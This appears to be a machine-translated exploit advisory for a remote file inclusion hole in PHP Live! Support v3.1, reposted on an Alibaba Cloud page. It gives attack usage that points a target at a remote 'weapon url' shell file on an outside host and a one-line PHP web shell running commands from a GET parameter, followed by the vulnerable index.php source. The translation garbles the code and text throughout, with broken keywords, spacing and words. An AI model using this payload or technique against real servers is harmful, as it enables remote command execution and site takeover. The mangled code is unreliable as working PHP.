PHP Live! Support v3.1 Remote File Inclusion

Last Update:2013-11-21 Source: Internet

Author: User

Tags set cookie

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Code:
#####
# [»] Author: Don Tukulesto (root@indonesiancoder.com)
# [»] Date: November 23,200 9
# [»] Homepage: http://www.indonesiancoder.com
# [»] Method: Remote File Transfer sion
# [»] Location: INDONESIA
# [»] Vendor: http://www.phplivesupport.com/
# [»] Describe: PHP Live! Support v3.1 (c) by OSI Codes Inc.

# Chat with your website visitors with PHP Live!
#
# * Provide Live Support on your Website
# * Increase your Sales
# * Increase Customer Satisfaction
# * Decrease your phone/operational costs
# [»] Usage:
# Perl tux. pl <target> <weapon url> cmd
# Perl tux. plhttp: // 127.0.0.1/path/
Http://www.indonesiancoder.org/shell.txt cmd
# Weapon example: <? Php system ($ _ GET [cmd]);?>
#####
<! -- More -->
# [-] Bugs in

[+] Index. php
<Pre lang = "php">
<? Php
/*************************************** ****************
* Copyright osi codes-PHP Live!
**************************************** ***************/
Session_start ();
$ L = "";
// Try to get cookie value first
If (isset ($ _ COOKIE [COOKIE_PHPLIVE_SITE]) {$ l =
$ _ COOKIE [COOKIE_PHPLIVE_SITE];}
If (isset ($ _ GET [l]) {$ l = $ _ GET [l];}
If (isset ($ _ POST [l]) {$ l = $ _ POST [l];}

If (! File_exists ("./web/conf-init.php "))
{
HEADER ("location: setup/index. php ");
Exit;
}

Include_once ("./API/Util_Dir.php ");
If (Util_DIR_CheckDir (".", $ l ))
Include_once ("./web/$ l/$ l-conf-init.php ");
Include_once ("./web/conf-init.php ");
$ DOCUMENT_ROOT = realpath (preg_replace ("/http:/", "", $ DOCUMENT_ROOT
));
Include_once ("$ DOCUMENT_ROOT/API/Util_Error.php ");
Include_once ("$ DOCUMENT_ROOT/system. php ");
Include_once ("$ DOCUMENT_ROOT/lang_packs/$ LANG_PACK.php ");
Include_once ("$ DOCUMENT_ROOT/web/VERSION_KEEP.php ");
Include_once ("$ DOCUMENT_ROOT/API/Util_CleanFiles.php ");
Include_once ("$ DOCUMENT_ROOT/API/SQL. php ");
Include_once ("$ DOCUMENT_ROOT/API/Users/get. php ");
Include_once ("$ DOCUMENT_ROOT/API/Users/update. php ");
Include_once ("$ DOCUMENT_ROOT/API/Chat/remove. php ");
Include_once ("$ DOCUMENT_ROOT/API/ASP/get. php ");

// Initialize
$ Action = $ error = $ sid = $ site = $ remember = "";
$ Sound_file = "cellular.wav ";
$ Isadmin = $ winapp = $ autologin = $ wflag = $ closewin = 0;

If (! Isset ($ _ SESSION [session_admin])
{
Session_register ("session_admin ");
$ Session_admin = ARRAY ();
$ _ SESSION [session_admin] = ARRAY ();
}

// Check to see if the site login is passes. if not, then lets see
How many
// Sites are in the asp model. if only ONE, then default to that one.
$ Total_sites = AdminASP_get_TotalUsers ($ dbh );
If ($ total_sites = 1)
{
$ Site = AdminASP_get_AllUsers ($ dbh, 0, 1 );
$ L = $ site [0] [login];
}

If (isset ($ LOGO) & file_exists ("$ DOCUMENT_ROOT/web/$ l/$ LOGO ")&&
$ LOGO)
$ Logo = "$ BASE_URL/web/$ l/$ LOGO ";
Else if (file_exists ("$ DOCUMENT_ROOT/web/$ LOGO_ASP") & $ LOGO_ASP)
$ Logo = "$ BASE_URL/web/$ LOGO_ASP ";
Else
$ Logo = "$ BASE_URL/images/logo.gif ";

// Get variables
If (isset ($ _ POST [action]) {$ action =$ _ POST [action];}
If (isset ($ _ GET [action]) {$ action =$ _ GET [action];}
If (isset ($ _ POST [winapp]) {$ winapp =$ _ POST [winapp];}
If (isset ($ _ GET [winapp]) {$ winapp =$ _ GET [winapp];}
If (isset ($ _ GET [wflag]) {$ wflag =$ _ GET [wflag];}
If (isset ($ _ GET [closewin]) & ($ _ GET [closewin]! = "Undefined ")
) {$ Closewin =$ _ GET [closewin];}

// Conditions
If (isset ($ _ COOKIE [COOKIE_PHPLIVE_LOGIN]) & isset (
$ _ COOKIE [COOKIE_PHPLIVE_PASSWORD]) & isset (
$ _ COOKIE [COOKIE_PHPLIVE_SITE]) &! $ Action)
$ Autologin = 1;

If ($ action = "login ")
{
If ($ l)
$ Site = $ l;
Else
$ Site = $ _ POST [site];

$ Aspinfo = AdminASP_get_ASPInfoByASPLogin ($ dbh, $ site );
$ Admin = AdminUsers_get_UserInfoByLoginPass ($ dbh, $ _ POST [login],
$ _ POST [password], $ aspinfo [aspID]);

If (! $ Aspinfo [active_status])
$ Error = "Servi? O est? Inativo. Entre em contato com o
Administrador para obter detalhes setup .";
Else
{
If ($ admin [userID] & ($ admin [aspID] ==$ aspinfo [aspID]
))
{
CleanFiles_util_CleanChatSessionFiles ();

// Set $ sid. $ sid is used to keep track of this admin
User. $ sid allows
// So a user can log into several admin departments on same
Computer. it is
// Passed everywhere the admin goes.
$ Sid = time ();

$ Administrative ments = adminusers_get_useradministrative ments ($ dbh,
$ Admin [userID]);
$ Dept_string = "";
For ($ c = 0; $ c <count ($ minutes); ++ $ c)
{
$ The_department = $ departments [$ c];
$ Dept_string. = "deptID = $ the_department [deptID] OR"
;
}
$ Dept_string. = "deptID = 0 ";

$ _ SESSION [session_admin] [$ sid] = ARRAY ();
$ _ SESSION [session_admin] [$ sid] [dept_string] =
$ Dept_string;
$ _ SESSION [session_admin] [$ sid] [admin_id] =
$ Admin [userID];
$ _ SESSION [session_admin] [$ sid] [requests] = 0;
$ _ SESSION [session_admin] [$ sid] [aspID] =
$ Aspinfo [aspID];
$ _ SESSION [session_admin] [$ sid] [asp_login] =
$ Aspinfo [login];
$ _ SESSION [session_admin] [$ sid] [active_footprints] = 0
;
$ _ SESSION [session_admin] [$ sid] [winapp] = "$ winapp ";
$ _ SESSION [session_admin] [$ sid] [close_timer] = 0;
$ _ SESSION [session_admin] [$ sid] [traffic_monitor] = 0;
$ _ SESSION [session_admin] [$ sid] [available_status] = 1;
$ _ SESSION [session_admin] [$ sid] [sound] = "on ";
$ _ SESSION [session_admin] [$ sid] [request_ids] = "";
$ _ SESSION [session_admin] [$ sid] [traffic_timer] =
$ Admin [lele_refresh];
$ Isadmin = 1;

// Check to see if they want to be remembered... if so,
Just set cookie.
// Lets set it for 1 month for now.
$ Cookie_lifespan = time () + 60*60*24*30;
If (isset ($ _ POST [remember])
{
Setcookie ("COOKIE_PHPLIVE_LOGIN", $ _ POST [login],
$ Cookie_lifespan );
Setcookie ("COOKIE_PHPLIVE_PASSWORD ",
$ _ POST [password], $ cookie_lifespan );
Setcookie ("COOKIE_PHPLIVE_SITE", $ aspinfo [login],
$ Cookie_lifespan );
}
}
Else
{
// Reset cookie if cookies are set
If (isset ($ _ COOKIE [COOKIE_PHPLIVE_LOGIN]) & isset (
$ _ COOKIE [COOKIE_PHPLIVE_PASSWORD])
{
Setcookie ("COOKIE_PHPLIVE_LOGIN", "",-1 );
Setcookie ("COOKIE_PHPLIVE_PASSWORD", "",-1 );
Setcookie ("COOKIE_PHPLIVE_SITE", "",-1 );
}
$ Error = "Falha de Login. Nota: sua senha? (CaSE
SenSiTiVE ).";
}
}
}
Else if ($ action = "logout ")
{
If (isset ($ _ COOKIE [COOKIE_PHPLIVE_LOGIN]) & isset (
$ _ COOKIE [COOKIE_PHPLIVE_PASSWORD]) &! $ Wflag)
{
Setcookie ("COOKIE_PHPLIVE_LOGIN", "",-1 );
Setcookie ("COOKIE_PHPLIVE_PASSWORD", "",-1 );
Setcookie ("COOKIE_PHPLIVE_SITE", "",-1 );
}
$ Sid = $ _ GET [sid];
$ L = $ _ SESSION [session_admin] [$ sid] [asp_login];
AdminUsers_update_Status ($ dbh,
$ _ SESSION [session_admin] [$ sid] [admin_id], 0 );
AdminUsers_update_UserValue ($ dbh,
$ _ SESSION [session_admin] [$ sid] [admin_id], "last_active _

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More